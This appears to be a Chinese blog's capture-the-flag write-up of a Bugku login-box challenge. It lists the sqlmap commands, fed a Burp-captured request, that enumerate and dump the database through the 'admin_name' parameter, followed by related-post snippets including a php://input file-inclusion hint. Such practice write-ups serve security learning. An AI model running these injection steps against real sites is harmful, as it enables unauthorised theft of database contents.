2. 程式人生 > >bugku-Web這是一個神奇的登陸框(sqlmap+bp)

bugku-Web這是一個神奇的登陸框(sqlmap+bp)

阿新 發佈:2018-12-17

根據url提示是讓sql注入,但萬能密碼又無效,這裡我們用sqlmap+bp來解題。

首先輸入使用者密碼來登入用bp抓包:

 如圖將其儲存到txt檔案中,然後用SQLmap來注入

輸入命令暴庫:sqlmap.py -r "1.txt" -p admin_name --dbs(我將1.txt和sqlmap儲存在同一個資料夾下了)

-p為注入點,就是admin_name ;r為讀檔案

會發現出來兩個資料庫,而我們需要的是bugkusql1,

然後暴表:sqlmap.py -r "1.txt" -D bugkusql1 -p admin_name --tables

爆出了flag1表,

然後爆列名:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --dbs

爆出了flag1列

然後爆欄位:sqlmap.py -r "1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump

就拿到flag了。

相關推薦

bugku-Web一個神奇登陸(sqlmap+bp)

根據url提示是讓sql注入,但萬能密碼又無效,這裡我們用sqlmap+bp來解題。 首先輸入使用者密碼來登入用bp抓包:  如圖將其儲存到txt檔案中,然後用SQLmap來注入 輸入命令暴庫:sqlmap.py -r "1.txt" -p admin_name --

一個神奇的登入Bugku-web題 使用sqlmap注入例項)

正在學習sqlmap,拿這個題先入門一下。先看下原始碼:是post提交,url明顯提示是個sql注入,由於post提交,要sql和burp結合起來使用。首先burp抓包,抓到包後選擇存到txt檔案中:(隨便輸入賬號密碼)我儲存到了D盤的1.txt裡。然後開啟sqlmap,輸入

BugkuCTF之web題之一個神奇登陸

BugkuCTF之web題之這是一個神奇的登陸框 開啟網頁之後發現: 隨便輸入賬號和密碼出現: 那就開始尋找注入點吧,輸入0’發現還是: 輸入0" 發現報錯: 確定可以注入,判斷欄位有多少個 0"order by 1,2,3# 發現: 說明有兩列。 輸入 0" union

Bugku-WEB-cookies欺騙(缺一個python指令碼)

題目: 這裡注意到filename=a2V5cy50eHQ=,應該是base64編碼,解碼一下,得到了keys.txt 想想應該怎麼利用一下呢。題目是cookies欺騙,可能keys.txt中應該存在我們所需要的cookies   解題:這裡想錯了。。沒仔細去看url

一個神奇多功能的FPGA設計模板!!

gvim fpga verliogFPGA工程師都知道,Verilog代碼絕大部分都是always語句,結構基本上都是一致的,為了減少重復性的工作,讓工程師專註於設計實現,明德揚精心制作了常用模板,只要你安裝好明德揚提供的GVIM,就能使用這些模板了。1.時序邏輯的模板在GVIM輸入“Module”並回車,如

驚!快快通一個神奇的掛站神器115.238.184.*

掛站防禦160G 掛站無視CC,封國外,封UDP,支持域名開80端口。聯系人:雨兒QQ177803621歡迎咨詢!可選擇IP:115.238.184.1 115.238.184.2 115.238.184.3 115.238.184.4 115.238.184.5 115.238.184.6 115.238.

一個文本只能輸入數字不能輸入文字

clas 文字 maxlength 文本框 聯系 ext blog this 輸入 經過驗證,可以使用 <ul> <li> &l

在北京待業的一個

在北京 width 可能 image font 現在 ima 技術 idt   故事緣由:如果說一個事情是怎麽發生的,那最大的可能就是偶然。我們無法左右的事情很多,這個時候最多的就是無奈和嘆息。剛畢業的我,就遇到了這樣一個糟心的事情,於是乎,開啟了這待業的一個月。   故

如何測試一個網頁登陸界面

攻擊 高度 case 邊界值 失敗 cal web測試 環境 暴力 具體需求: 有一個登陸頁面, (假如上面有2個textbox, 一個提交按鈕。 請針對這個頁面設計30個以上的test case.)此題的考察目的: 面試者是否熟悉各種測試方法,是否有豐富的Web測試經驗,

做了一個模擬登陸的程序,以後再來看看你的缺點

模擬 div global user word don 賬號登錄 else lob jindong_user ="xiong"jingdong_password = "ok"weixing_user = "abc"weixing_password = "123"pass_l

js入門-文本輸入特定內容控制另一個文本

body one input oct tex www. ext strong doctype 在填寫表單時,有時需要某些文本框隱藏,當一文本框輸入特定內容時才會顯示隱藏的文本框,這一功能可以用onchange事件或oninput事件實現。下面對比下兩種方法實現的區別: on

html +css 登陸中加用戶圖片,並設置登陸名不蓋住圖標

png top tle lin 分享圖片 head bubuko 用戶輸入 color 1 <!DOCTYPE html> 2 <html lang="en"> 3 <head> 4 <meta charset="

一個神奇代碼和一個坑爹代碼

神奇 python 5.1 分享圖片 caml space java bsp perl 上述代碼會運行一次生成一種語言代碼,最後運行回了ruby代碼。11種如下: ruby 1.8.7-p72、Python 2.5.2、perl v5.10.0、Lua 5.0.3、OC

BugKu 雜項-麽多數據包

可能 基礎 cookie 數據 現在 編碼 技術分享 三次握手 解碼 前邊的都是些無關緊要,只要有點網絡的基礎我想應該都能懂,往下看,一直到NO104,這是在幹什麽? 源ip138一直向目標ip159發送syn握手包,想要建立連接,其實就是端口掃描,原理就是,想和你某個端

案例三:小明左右手分別拿兩張紙牌:黑桃10和紅心8,現在交換手中的牌。編寫一個程序模擬一個過程:兩個整數分別保存在兩個變量中,將兩個變量的值互換,並輸出互換後的結果。

nbsp 一個 span right static http 變量 pub left package project_03; /** * 2018-9-7 20:19:59 * @author Sauron XiaMen * */ public class Cha

一個神奇的工具,linux猿工具(www.666cmd.com)

src 軟件安裝 都在 str www. roc 搜搜 linux com [每次遇到命令參數和常用軟件安裝都在百度和谷歌各種搜搜,今天我要說不,把瑣碎的命令和常用軟件安裝自己整理成一個頁面,自己用的同時供大家免費用,免費用,免費用!!!請添加鏈接描述](http://ww

Bugkuweb—web3(wp)

0x00 前言 這是Bugku中web中的web3的題目。 0x01 解題過程 1.點選這個網址,會出現一個介面,無論點選哪裡都關不掉。 2.考慮這是瀏覽器指令碼的設定因素,可以關閉你瀏覽器裡指令碼的在設定採用禁用。 3. 關閉指令碼後,再開啟網址,發現是一片空白,於

Android核心技術-day04-04-Web方式類qq登陸

package com.gaozewen.qqloginweb; import android.content.SharedPreferences; import android.os.Bundle; import android.os.Handler; import android.os.

SQL之merge into 批量更新資料 Merge關鍵字是一個神奇的DML關鍵字。它在SQL Server 2008被引入,它能將Insert,Update,Delete簡單的併為一句。M

轉載http://www.cnblogs.com/ruiati/archive/2013/01/18/2866017.html     Merge關鍵字是一個神奇的DML關鍵字。它在SQL Server 2008被引入,它能將Insert,Up

BugKu Web WP2

Web 8 這道題的程式碼和前面的檔案包含寫的思路一樣, 我們都是運用  php://input 寫,來實現我們從檔案中讀出的資料和我們傳入的資料一樣。 我寫的如下:  只要保證  $ac  的值 和我們寫入檔案  $fn 的值 一樣即可,